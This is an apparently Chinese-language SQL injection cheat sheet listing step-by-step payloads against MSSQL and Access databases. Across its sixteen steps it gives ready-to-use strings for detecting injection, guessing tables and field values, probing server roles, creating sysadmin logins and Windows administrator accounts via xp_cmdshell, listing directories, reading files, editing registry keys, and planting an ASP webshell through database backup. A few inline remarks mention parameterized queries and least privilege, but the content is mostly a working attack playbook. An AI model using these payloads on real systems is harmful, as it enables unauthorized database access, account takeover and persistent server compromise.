1.判断是否有注入 ;and 1=1 ;and 1=2 (仅当参数被直接拼接进SQL语句时才成立;使用参数化查询后,这类测试不会改变查询逻辑)
2.初步判断是否是mssql ;and user>0
3.注入参数是字符 'and [查询条件] and ''='
4.搜索时没过滤参数的 'and [查询条件] and '%25'='
5.判断数据库系统
;and (select count(*) from sysobjects)>0 mssql
;and (select count(*) from msysobjects)>0 access
6.猜数据库 ;and (select Count(*) from [数据库名])>0
7.猜字段 ;and (select Count(字段名) from 数据库名)>0
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0
9.(1)猜字段的ascii值(access)
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0
(2)猜字段的ascii值(mssql)
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0
10.测试权限结构(mssql) (IS_SRVROLEMEMBER/IS_MEMBER 返回1表示当前登录属于该角色;Web应用使用的数据库帐号不应属于这些角色)
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));--
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));--
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));--
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));--
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));--
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));--
;and 1=(select IS_MEMBER('db_owner'));--
11.添加mssql和系统的帐户 (以下语句需要当前登录具有较高的服务器权限,如sysadmin;xp_cmdshell自SQL Server 2005起默认禁用)
;exec master.dbo.sp_addlogin username;--
;exec master.dbo.sp_password null,username,password;--
;exec master.dbo.sp_addsrvrolemember sysadmin username;--
;exec master.dbo.xp_cmdshell 'net user username password
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';--
;exec master.dbo.xp_cmdshell 'net user username password /add';--
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';--
12.(1)遍历目录
;create table dirs(paths varchar(100), id int)
;insert dirs exec master.dbo.xp_dirtree 'c:\'
;and (select top 1 paths from dirs)>0
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>)
(2)遍历目录
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));--
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树结构
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容
13.mssql中的存储过程
xp_regenumvalues 注册表根键, 子键
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值
xp_regread 根键,子键,键值名
;exec xp_regread
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回指定键的值
xp_regwrite 根键,子键, 值名, 值类型, 值
值类型有2种:REG_SZ 表示字符型,REG_DWORD 表示整型
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表
xp_regdeletevalue 根键,子键,值名
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值
14.mssql的backup创建webshell
use model
create table cmd(str image);
insert into cmd(str) values ('');
backup database model to disk='c:\l.asp';
15.mssql内置函数
;and (select @@version)>0 获得Windows的版本号
;and user_name()='dbo' 判断当前系统的连接用户是不是sa
;and (select user_name())>0 爆当前系统的连接用户
;and (select db_name())>0 得到当前连接的数据库
16.简洁的webshell
use model
create table cmd(str image);
insert into cmd(str) values ('');
backup database model to disk='g:\wwwtest\l.asp';